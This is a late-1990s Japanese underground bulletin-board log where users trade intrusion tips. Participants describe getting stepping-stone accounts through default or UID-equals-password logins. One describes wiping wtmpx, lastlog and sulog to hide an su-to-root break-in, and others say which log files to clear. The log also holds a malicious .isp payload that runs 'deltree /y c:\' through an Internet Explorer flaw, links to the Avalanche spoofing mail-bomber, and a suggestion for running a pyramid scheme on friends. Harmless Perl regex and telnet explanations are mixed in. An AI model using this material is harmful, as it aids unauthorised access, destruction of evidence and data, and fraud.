今月の月刊WindowsNTWorldは
ファイアーウォールの特集と
NTサーバーのセキュリティの甘いところの解説
ScanNT（NT用Cracker Jack）の紹介
など、大変参考になるお買い得な本になってます（笑）
おまけで、NT4.0ServicePack２も付いて1280円。
買っときましょう。（笑）

http://skyport.com/kenjin/s914/a023.htm
来れ！！！良い子！！

パッチかましたらIEが直ったんでNOSCRIPTがあると
以後表示されないことに今、気が付きました。
ここのデータと過去ログ５を修正しました。

ありがとうございます！＞tamonさん、謎？さん
精進してきます。
某掲示板に現れたラテン系の彼はそれで設定をころころ変えられたわけですね。
でもそれは単に彼が使い手だからかな？

24時間もかからないらしい。ろくにチェックもしないでとりあえずIDを発行してしまう。
そしたら速攻
mv joe.c hoe.c
gcc -o hoe hoe.c
./hoe > hoe.txt
で、一週間過ぎてもしばらく使える。
（joe.cはマニュアル参照）＜ピンクのマニュアル
（man joeでわかる＜嘘っこ）
これで踏み台は完成？？？
よって、if( ask == はなたれ )の()の中の式は真（1）を返す。

askはshellを開放しているうえに、「メールで申し込めば24時間以内に一週間使える仮IDを発行します」
ってのがウリらしい。
よって、「ask＝はなたれ」決定。

to Keynesさん
一般のアカウントってたまに（結構かもしれない）
JOEアカウント（だったかなぁ）っていわれるUID=PASS
があるんで、そうゆうのを探して使います。
あとは、システムやソフトでデフォルトのアカウントとか
（たとえばORACLEの接続アカウントだとsysユーザーで
change_on_installってパスワードがデフォルト。ただし
これはUIDじゃないから使えませんが）
結構あまいんじゃないでしょうか？

あとは
http://www.nyct.net/~malba/HackFAQ-4.txt
このへんをちゃんと読んで基本的な知識を身に付けて
ください。（って私も途中までしか読んでませんが）

昨日、Perl本探しにいったんですが
「UNIX短編シリーズ Parl」クオリティー株式会社   定価1339円
ってのが、３／３日に発売になってまして、思わず買いました。
厚さは１センチも無いんで、ラクダ本は途中でギブアップした
人とかお勧めです。（笑）

cookie?

saa

test.sorry.

test.sorry.

レスどうも＞tamonさん、Magiさん
やっぱりそんな間抜けなことしてるとこないですよね。でも皆さんは足がつく
ようなとこからやばいことしてるわけではないですよね？踏み台になるような
とこのＩＤってどうやって手に入れてるんですか？今いろいろ読み漁っては
いるんですが一般ＩＤを持っていることを前提としてるものばかりで困ってます。
探しかたが足り無いんでしょうか？何かヒントもしくは参考となる文書のありか
を教えていただけないでしょうか？

shellスクリプトただ書いただけでは実行権限無しの場合が多く、そのままでは
実行は出来ない。ただ、sh csh perl awk などの補助で（つまり awkなら
awk -f hoge.awkのように）やる分には問題ないが。anonymous（ftp）にそんな
権限くれてるトコは知らんし、通常 anonymous-ftp用ディレクトリはchroot環境
にあるだろうから、通常loginできる環境で入れなければ非常に面倒。外部から
実行権限付けるならftp の siteコマンド使用で出来る場合もあるが、期待薄。
100まわって、1あればいいほうだろう。一般ID掠め取るほうがマシだな。

to ハイパーリンクさん
あれは一応黙認してます。現場にいました＜私

アップはできてもshellできないんですよねぇ？
たとえばCGIだったら、CGIを許可してるHTTPDがあって
そのディレクトリに書き込めて、FTPからパーミッション変更
できれば、ブラウザから起動できるんじゃないかなぁ？

私はいまUnix等を使える環境に無いのですが、notepadか何かでshell script書いて
FTPサーバーにAnonymousでアップした上で実行するなんてことは可能でしょうか？
もしできるならその場合拡張子はなんてつければいいのでしょうか？やはり全然見当
違いのことを言ってるのかな？

あら、飛んできてしまいました。
HTTP_REFERER参照

MSIE 3.0b/3.01bへの修正モジュールでも.ispファイル対応を
それでやってるね。修正モジュールとして配布した点ではMSの
努力を認めるけど、なんかねぇ…てな感じだなぁ。＞CLOUD9

ども、はじめまして。
ＭＳＩＥで心配なら、ファイルタイプ編集でＩＳＰファイルの
「ダウンロード時に開く確認をする」をチェックしとけば
不用意にやられることは回避できそうです。

http-user-agent = Mozilla/2.0 (compatible; MSIE 3.01; Update B; Windows NT)
になってた。

ありがとうfjmaruさん。but
Double click here:のとこに何も表示されないので
結局できませんでした・・・。
とかいってるうちにIEを3.01bにしたので、もうみれませんね。
下のデリートされるのとかって冷汗ものでした。

すぐアップデートする人ってあんまり居ないと思うから
まだ脅威だと思いますが・・・

その環境なら、http://dec.dorm.umd.edu/iebug.html に行かれてはどうでしょう to tamon

ＡｖｔｉｖｅＸやＪＡＪＡのｓｅｃｕｒｉｔｙを乗り越える奴はそのうち出てくるとは思っていたが、
こりゃＯＳの致命的欠陥じゃないのかな。
Netscapeにとっては朗報だな。

あれぇ？動作しない・・・
ISPファイルの中身が表示されるだけだ。
NT4.0Workstation＋IE3.0はできないのかなぁ
セキュリティーは全部チェックしてるんだけど・・・

fjmaru氏の紹介しているページに行ったら動作しますな。(^^;
過去作ったスクリプトはミスがあったようだ。（苦笑）
※って事でパッチ当ては必須の模様

ActiveXスクリプトを実行のチェックを外しておけは＜script＞は無視する様なので
パッチを当てなくても無害で済みそうです。
スクリプトをオフにしておけば自動的にダウンロードも行われません。

ひとまずMSIEは全部オプションオフで利用するのが基本となりそうだ。
mailbox:等の悪戯も被害は受けませんので裏掲示板の巡回にはネスケより向いている
のかもしれないな。（フォーム送信が働かない場合があるが。(^^;）

MSIEユーザーの皆様、http://web.mit.edu/crioux/www/ie/index.html は読まれましたか？

　ここの掲示板が開設初期に、個人情報を吸い出すページとか、
ハードディスクのファイルを消去するページとか、
アクセスしたパソコンのエロ画像を吸い出すページの作成を依頼します、
という冗談があったけど（過去ログ１参照）、MSIEだと本当にできちゃうのね.
アクセスしたらウイルスをダウンロードというのもできるらしい.
しかもActiveXやJavaとは無関係だから、かなわんな。


[Entry]
Run=c:\windows\command\start.exe
Argument=/m c:\command.com /c deltree /y c:\

のISPに当たったら、ネスケのmailbox:auxどころじゃないな。

ぅぅ　初心者ですいませぬ・・

とりあえず、wtmpxをNULL にして、lastlog、sulogなども同時にnullにする
ことで解決しました。　（なんか怪しいカナ・・）
元ファイルは一応消さずに"..."配下に置いておきました。　小心者＞オレ
これで管理者だませるだろうか・・

>ちなみに/var/adm/wtmpxっていうのもあるよ。
確か、コイツを消すとlastコマンドが実行出来なくなったと思った。

>あと、仮にこのファイルを消せても、その後logoutすると、その時のログは
>残る気もしますね。
最近は他人のIDからsuでrootに入ってるんだけど、最初のIDが足がつくヤツなので・・
過去ログを消したいワケです。

今夜もいろいろ試すか。。

solarisじゃないかな？
あれは、普通のとはちょっと違ってるぞ。

OSのバージョンによっていろいろあると思うので、man lastをチェックしてみては？
ちなみに/var/adm/wtmpxっていうのもあるよ。
あと、仮にこのファイルを消せても、その後logoutすると、その時のログは
残る気もしますね。

/usr/adm/lastlog
コイツも一応rootからrenameしてテストしたんだけどダメだったなぁ・・
どこからか復元してしまうんですよ。

 Avalancheのアーカイブにあったserver.lstだけどsendmailの3.2.8?
使ってるサーバーって１個しかなかったのだが、他のってどうやって使うんだろ？
ヘッダーが山ほどあっても中間に自分のIPあったら意味ないような気がするんだけど？
まあ、mailerに適当な名前つけたり、domain名を勝手につけれるから、
emailのヘッダーを読む習性のある人に出すときには面白いけど、ただそれだけよね。
掲示板にMozillaをGodzillaと表示させて遊ぶのと同じ.

SunOS は良く知りません。
普通は下の３つでは？
/etc/utmp
/usr/adm/wtmp
/usr/adm/lastlog.
Avlanche 使ってみたけど、こりゃすごい。← ヘッダー
でも、あそこまでやるといかにもAvlanche使いました、と言っているような気も.....

ちと質問します。
あるホストのlastコマンドによる履歴を消したいんですが、/etc/wtmp、
/usr/adm/wtmpを消しても、まだ履歴が出力されるんです。(T_T)
ちなみにSunOSです。　誰か教えてください。
（ちなみにutmpは消せました。　）

ヘッダーを賑やかにするやつ？
received:XXXXXX
receivedXXXXXXX

http://members.tripod.com/~HackerZBBS/alanch28.zip

Anonymous email bomber for Windows 95 and Win 3.X.
SMTP spoofing e-mail client spoofing clone options
random topic and message generator Flamer option and more.です。

 http://holly.ColoState.EDU/~jkrysin/avalanche.zip(v2.5です。)

 そんなに必要性感じないけど、どうバージョンアップしたのか見たいので
 一応ｖ2.8探してます。(笑)

Alta Vistaでも見つからないんですが。
なんなんだか教えてください。

Avlancheって洗練されてバージョンアップされてたんですね.
毎日新聞のボケ記事があったので調べてみたらver2.8になってました。
日本語文字化けするのは仕方ないな。自分宛のメールに使ってみましたが、
知識のない相手ならSMTPのSendmailが新しくても十分にごまかされるだろうな、
と思いました.

企業内サーバーとかいろんなのでてきちゃったんで
refs.cgiはプライバシー保護の為やめました。
あと、県人会以外のリンクも通るようにしました。
（記録はとっときますが・・・）

sex.comはいいとして（笑）ローカルホストって手がありましたねぇ。
わざとかなぁ？

ごめんなさい、ちょっといたずらしちゃいました。
消しておいて下さい :-) ＜ refs.cgi
（こういうのは「落とし穴」とは言わない？）

　ネズミ講は他人の住所氏名を掲示板に「さらし者」として公開する有効な手段ですね。
いろんな掲示板に載っていた住所氏名は自分で書いたものってどのくらいあるのでしょうかね。

正当な理由の削除依頼があれば消します。
ねずみ講のやつは投稿者の意図が分からない為
マスクしてます。（どこを？（笑））

もし、話題の種にしたかった場合のレスも書いときます。

このシステム、リストに５人しか載せないところがうまいですねぇ。
参加者の出費を５ドルに押さえ、参加しやすくさせてますね
あとリストが更新されて自分の番が回ってくる錯覚におちますね
最初の掲示の後は加速度的に参加者が減る（よく考えれば
わかるよね）ので５人で十分なんでしょうね。
最初の５人はほくほくってとこですね。

まあやるとしたら、５人友達あつめて今まで掲示のない所で
新しく始めればたくさん騙し取れるんじゃないでしょうか？

消したら？　ねずみ講のpost
なめてるのかな　ここの掲示板

県人会のリンクが消えないんで、HTTP_REFERERが付いてて
頭にFILE://か
http://www.kinet.or.jp/naka/tomo/wwwc.html以外
のリンクではメンテナンス中って出るように細工しました。
もし、リンクを常用して不都合のある方がいれば
直します。
なにぶん、CGI（Parl）勉強中ですので落とし穴がある
かもしてませんが、ご容赦ください。
HTTP_REFERERログは
http://www.cc.rim.or.jp/~tamon/cgi-bin/refs.cgi
です。

to 202.215.60.109さん
下のってアメリカじゃ取り締まりはじまったんでしょ？
けっこうマルチまがいってバッシング食らうんで気をつけてね。

http://www.try-net.or.jp/~xxxxxxxxx/money/money.html

何処にでも居るんやねぇ、究極お馬鹿さんが。
そんな奴がこれからもどんどん増えるかと思うと、頭痛いですわ。

一度痛い思いさしたるとええんやないかい？;-p

k-kumaのこと？k-kumaならあるよ。
↓

某所ゲストボードって
プロクシ通してると入れないところだっけ?

>って何のこと？

telnetのことです。

>なんでやねん・・・

県人会のある所からリンク張られてたのが原因かな？
課題も課題でしたし。表から直はまずいでしょう。きっと。

>ルルーさんに答えていただいた質問っていたずらだと思ってたんですが
って何のこと？

某所ゲストボードが閉鎖されてるね。
すごく悲しい。もっと勉強したかったのに。

なんでやねん・・・＞sktOp

ルルーさんに答えていただいた質問っていたずらだと思ってたんですが
県人会からリンクされてたとはねぇ・・・
某所ゲスボは”もっと”UGへの目標だったんで残念です。

無くなってしまいました。
せっかく盛り上がりかけたところだったのですが、
あるバカのためにやむなく閉鎖しました。

また、別の場所に移動するつもりですが、次回は公開するかどうか・・・

>って、  《 s/onMouseOver//ig; 》だけでいいんじゃないの？
>onMouseOverの話題自体できなくなる可能性はあるけど :-)

ですね。ただ、どこでもonMouseOverをかくと消えちゃうってのは
やだったんでAタグの中のonMouseOver以降だけを
Aタグを生かしたまんまで消したかったんです。
<>以外は意識しないで書ければいいと思ってます。

>＃ ‘隠れ’の真似なんてやめようよ！

まあ、メッセージが同じなのはやりすぎたと思います。やめました。
ただ、あの思想は賛成なんで、Coolなメッセージだれか考えて下さい。（笑）
</html>

> UNIX サーバに telnet で接続して行うとはどの様なことなのでしょうか？
何を‘行う’のかによって大きく２つにわかれます。

１つは（こちらの方が普通の使い方です）、
サーバマシンのtelnetポートに接続して、シェル環境を利用する。
cdコマンドでそのマシン内のディレクトリをさまよったり、その他、
使用権限のあるさまざまなコマンドが使えます。
ここのボードの話題にそくして言えば、ＣＧＩプログラムを設定したり
変更したりする時にこのtelnet接続を利用することになるでしょう。
また、利用するにはlogin名とパスワードを要求されます。
権限のないマシンには接続できません。ちなみにこの‘権限のないマシン’
に接続することが、ハッキングの第一歩と言えるのではないでしょうか。

もう一つは、telnet以外のポートに接続するということで、
例えばWWWサーバとhttpに則ってテキストベースでやりとりすることを
さします。（つまり、telnetコマンドは超低機能Webブラウザにもなる！）
WWWに限らず、メールとかニュースとか、何でもtelnetでできます。
ブラウザその他のソフトに頼らず、実際にサーバとどんなやりとりを
するのかを見るのに便利です。

--
> onMouseOverだけ消そうと思って
って、  《 s/onMouseOver//ig; 》だけでいいんじゃないの？
onMouseOverの話題自体できなくなる可能性はあるけど :-)

＃ ‘隠れ’の真似なんてやめようよ！

＜−こんなところでhtmlタグ閉じて悪さしようとしたのは（202.239.113.202 Mozilla/2.0 (compatible; MSIE 3.01; Windows NT)）です。−＞HTMLたぐ
＜−bodyは一個で助ェ。削除。−＞bodyたぐ

あそこほど厳しくないので、テストしないでね（笑）

あ、いやＣＧＩ取ってきたわけじゃないす。
あそこに入ってログ消せるほど上級者じゃないっす。
動作を見つつ真似しただけ。
ヒントはもちろんHoSe GarPatChoさんのスクリプト。
あそこってHoSe GarPatChoさんが改造してたのね。
失礼しました。

意図的にやってたんじゃなかったのか。  ＜noscript＞
空白の掲示板じゃなかったのね。
私も２日ほど不思議に思っていた。 アミーゴ。
じゃ、これから酒飲みに行ってきます。アミーゴ

なるほど。
＜Aタグとか限定しようとしたのがいけなかったんですね。＜私
（+）の使い方も間違ってそうですし・・・

DOS AMIGOS!

つまるところ、
　onMouseOver〜"〜"〜＞
に当てはまる部分だけ引っこ抜くアミーゴ。で、＞に置き換えて閉じるアミーゴ。
この型ならタグ内の前後の順番とかに関係なく引っこ抜けるアミーゴ。
＞で閉じたのはおまけメッセージを簡単に追加したかっただけアミーゴ。

ただタマに関係無いところを引っこ抜いて勝手に閉じちゃう事もあるかも知れないアミーゴ。
（例えばタグ以外の本文にあっても容赦しないアミーゴ。その場合＞はゴミになるアミーゴ）

でも、それは「仕様」だから潔く諦めるアミーゴ。細かい事気にしてたら親の死に目に会えない
って昔のメキシコ人はいいこと言ったアトーのせさくさくじゃぁって言われてもねぇ、、、。

”さらに少し生意気”のソースですね。
あのソースとってもほしいんですけど、連絡先わかんないし・・・
私もonMouseOverからあとだけ消そうとしたんですが、
消せなかったです。できればだれか添削してくれると
よく理解できるんですが・・・・
とにかく、onLoadとonMouseOverの部分、ありがとうございました。

DOS AMIGOS!

この場合、escapeの"\"（バックスラッシュ）はいらなかったかも知れないアミーゴ。

DOS AMIGOS!

miniBBSのcgiは見たことないんで参考にならないかも知れないけど、
某所ではこれでうまくいったみたいアミーゴ。
一応、onMouseOver〜の部分だけ消すことが目的アミーゴ。
おいらは、リンクはリンクとして生かしたかったアミーゴ。
その筋（どの筋）の人間じゃないんで、役に立たなかったら無視してアミーゴ。

置き換える文字列は単なるおまけナオーミよ。　...そんな、３文字も変わって...。

============================================================================
    $delfont = "＜font size=2 color=#cccc99＞";
〜　〜
    $value =~ s/onMouseOver([^\"]*)\"([^\"]*)\"([^>]*)＞/＞$delfont＜−onMouseOver
    　　　　　使われると個人の意志を無視するので削除。絶対削除。−＞＜\/font＞/ig;
    $value =~ s/onLoad([^\"]*)\"([^\"]*)\"([^>]*)＞/＞$delfont＜−onLoad
    　　　　　使われると個人の意志を無視するので、当然削除。−＞＜\/font＞/ig;
============================================================================
（場合によっては適当にマスクしてアミーゴ。判断は任せるアミーゴ。）
（＜＞は２byteに置き換えてpost）

onMouseOverだけ消そうと思って
$value =~ s/＜a(([^onmouseover]+)*)onmouseover(([^＞]+)*)>/＜a $1＞/ig;
って書いてみたんですが、だめでした。
正規表現道は厳しい・・・
だれかHELP。

test

IEつかってるもんで、ぜんぜん気がつかなかったです。
ちょっと正規表現を勉強中で、onMouseOverだけ消すのが
できなかったので、対応できるまでと、出来心でした。
とりあえず、はずしときました。
このディレクトリのcount.txtってファイルでログとかの表示
をしてるんですが、そこにタグを足してしまいました。

DOS AMIGOS!

＜noscript＞タグをアタマに追加したのは何故アミーゴ？
多分悪戯対策だと思うんだけど、おいらの環境ではブラウザ設定でjava有効にしてあると、
スクリプトの有る無しにかかわらず、このタグ以降何も表示されなくなるアミーゴ。
（これに気付くのに２日かかったアミーゴ。ソースは全部来てるのに何故真っ黒？
　colorタグは白なのに何故真っ黒？...ってこの２日、首を傾げていたアミーゴ。）

java無効の設定を強要するのが狙いアミーゴ？　.....そうなら仕方ないアミーゴ。諦めるずら。
でも、もしイタズラ対策だったら、出来ればcgiで処理してもらえると嬉しいアミーゴ。

（ちなみに環境は mac/ns3.0 で、midiは LiveAudio  midiplugin  MIDPLUG2.0  Crescendo
　全部ダメアミーゴ。前のバージョンでは大丈夫だったのに、最近はjava環境を前提にした
　のが増えて来たアミーゴ。せち辛い世の中.....メキシコが懐かしい。（行ったこと無いけど））

java無効に設定してもいいんだけど、そうするとおいらの環境では midi-plugin を読み込んだ
瞬間 MacsBug に落ちる（つまりcrashする）アミーゴ。これ下手なイタズラより効くアミーゴよ。
ダメージが足にくるアミーゴ。ポン酒の二日酔いより効くアミーゴ。　　分かりやすく言うと、
放心状態続最低弐分　無気力的精神　似空中浮揚　嗚呼脱力感　網囲碁。我観囲碁？阿弥以後？阿弥射悟？（不明）

出来る範囲でお手伝いするので、何とか考え直してもらいたいアミーゴ。
心から陳情するアムーロ奈美恵。　猿？　否、超越的地球外生命体　絶対非人類　確信的恐怖。　コワイってば。

初めまして。私は初心者です。どこに質問したらよいかも分からない質問
なのですが、窓の杜を覗いてみて疑問に思ったことです。
UNIX サーバに telnet で接続して行うとはどの様なことなのでしょうか？
さらに私はインターネットなるものにどの様に接続しているのでしょうか？
使い方が分からないのにターミナルエミュレータで接続すると
loginpasswordを要求しているらしくlogin出来ません。
どの様にしてUNIX サーバに telnet で接続すればよいのでしょうか。
分かりやすい解説お願いします。

まえに、みゆきが使ってたメールアドレスって
http://www.broadway.or.jpのメールアドレスだったけど
ここって1時間以内のアクセスなら無料なんで
ただでつかえるんですねぇ。
フォーラムヒルズに３つも掲示板取ってるし・・・
ホームページもフリーだし・・・
運営費っていったい・・・。オレンジ共済か？（笑）

---

MiniBBS v5.0 is Free.